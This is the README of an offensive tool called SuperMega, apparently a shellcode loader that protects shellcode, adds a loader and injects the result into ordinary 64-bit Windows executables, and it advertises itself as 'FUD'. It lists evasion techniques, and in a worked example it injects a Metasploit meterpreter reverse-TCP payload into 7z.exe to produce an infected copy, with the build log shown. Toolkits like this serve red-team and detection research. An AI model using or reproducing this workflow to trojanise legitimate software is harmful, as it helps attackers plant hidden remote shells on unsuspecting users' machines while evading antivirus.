
SuperMega - Cordyceps Implementation

Ophiocordyceps camponoti-balzani is a species of fungus that parasitizes insect hosts of the order Hymenoptera, primarily ants. O. camponoti-balzani infects ants, and eventually kills the hosts after they move to an ideal location for the fungus to spread its spores.

What

SuperMega is a shellcode loader. It takes shellcode as input, protects it, adds a loader, and injects the resulting shellcode into an EXE.

FUD.

And:

  • Only works with 64-bit (shellcode and infectable EXEs)

Features:

  • Loader source is C yay
  • Execution-Guardrails
    • Environment variables
  • configurable implementation
  • different EXE injection techniques

Plugins:

  • source style:
    • PEB_WALK
    • IAT_REUSE
  • alloc style:
    • RWX
    • REUSE_RWX
  • decoder style:
    • PLAIN_1
    • XOR_1
  • dataref style:
    • APPEND

Examples

Metasploit in 7z

Inject metasploit into 7z.exe. It will use PEB_WALK.

PS C:\repos\supermega> python.exe .\supermega.py --shellcode .\shellcodes\msf-meterpreter-reversetcp.bin --inject .\exes\7z.exe
(supermega.py) Super Mega
(helper.py   ) --[ Remove old files ]
(model.py    ) --( Capabilities: 
(model.py    )   0x0: GetEnvironmentVariableW (b'')
(model.py    )   0x460090: VirtualAlloc (b'')
(supermega.py) --[ SourceStyle: peb_walk
(compiler.py ) --[ C to ASM: build\main.c -> build\main.asm ]
(compiler.py ) ---[ Make ASM from C: build\main.c ]
(compiler.py ) ---[ Fixup  : build\main.asm ]
(compiler.py )     > Replace external reference at line: 8
(compiler.py )     > Replace external reference at line: 395
(compiler.py )     > Replace payload length at line: 389
(compiler.py )     > Add end of code label at line: 807
(compiler.py ) ---[ Cleanup: build\main.asm ]
(assembler.py) --[ Assemble to exe: build\main.asm -> build\main.exe -> build\main.bin ]
(assembler.py) ---[ Assemble ASM to EXE: build\main.asm -> build\main.exe ]
(assembler.py) ---[ EXE to SHC: build\main.exe -> build\main.bin ]
(helper.py   ) --[ Code section: .text
(helper.py   )     > 0x1000 Code Size: 2557  (raw code section size: 2560)
(assembler.py) --[ Merge stager: build\main.bin + .\shellcodes\msf-meterpreter-reversetcp.bin -> build\main.bin ]
(assembler.py) ---[ Size: Stager: 2557 and Payload: 449  Sum: 3006 ]
(injector.py ) --[ Injecting: build\main.bin into: .\exes\7z.exe -> .\exes\7z.infected.exe ]
(supermega.py) --[ Start infected exe ]

Directories

  • shellcodes/: Input: shellcodes we want to use as input (payload)
  • source/: Input: loader C templates
  • plugins/: Input: loader C implementations
  • exes/: Input: non-malicious EXE files we inject into
  • build/: Build: temporary files during the build process
  • logs/: Build: files generated by building (inspect for debugging)
  • out/: Output: the generated result (infected EXE)

Installation

Paths

Configure config.yaml with:

path_cl: 'C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\bin\Hostx64\x64\cl.exe'
path_ml64:  'C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\bin\Hostx64\x64\ml64.exe'

path_masmshc:  'C:\Users\hacker\Source\Repos\masm_shc\out\build\x64-Debug\masm_shc\masm_shc.exe'
path_runshc: 'C:\Users\hacker\Source\Repos\masm_shc\out\build\x64-Debug\runshc\runshc.exe'

Make sure it is the Hostx64\x64 cl.exe. Make sure to compile masm_shc and runshc as 64-bit. You can also replace runshc with your own shellcode loader.

Environment Variables

$Env:PATH += ";C:\Tools\radare2-5.8.8-w64\bin"

Use

"C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\Build\vcvars64.bat"

or the VS developer console to find the damn environment variables, and set them in your Python console. In my case:

$env:INCLUDE = "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\include;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\ATLMFC\include;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\VS\include;C:\Program Files (x86)\Windows Kits\10\include\10.0.22621.0\ucrt;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\um;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\shared;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\winrt;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\cppwinrt;C:\Program Files (x86)\Windows Kits\NETFXSDK\4.8\include\um"
$env:LIB="C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\ATLMFC\lib\x64;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\lib\x64;C:\Program Files (x86)\Windows Kits\NETFXSDK\4.8\lib\um\x64;C:\Program Files (x86)\Windows Kits\10\lib\10.0.22621.0\ucrt\x64;C:\Program Files (x86)\Windows Kits\10\\lib\10.0.22621.0\\um\x64"
$env:LIBPATH="C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\ATLMFC\lib\x64;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\lib\x64;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\lib\x86\store\references;C:\Program Files (x86)\Windows Kits\10\UnionMetadata\10.0.22621.0;C:\Program Files (x86)\Windows Kits\10\References\10.0.22621.0;C:\Windows\Microsoft.NET\Framework64\v4.0.30319"

VS2022 Components

A list of packages/components which may be required for Visual Studio 2022:

  • C++ 2022 Redistributable Update
  • C++ Build Insights
  • C++ CMake tools for windows
  • C++ /CLI support for v143 build tools (latest)
  • MSBuild
  • MSVC v143 - VS 2022 C++ x64/x86 build tools (latest)
  • C++ ATL for latest v143 build tools (x86 & x64)
  • C++ MFC for latest v143 build tools (x86 & x64)
  • Windows 11 SDK

Automated archival mirror of github.com/dobin/SuperMega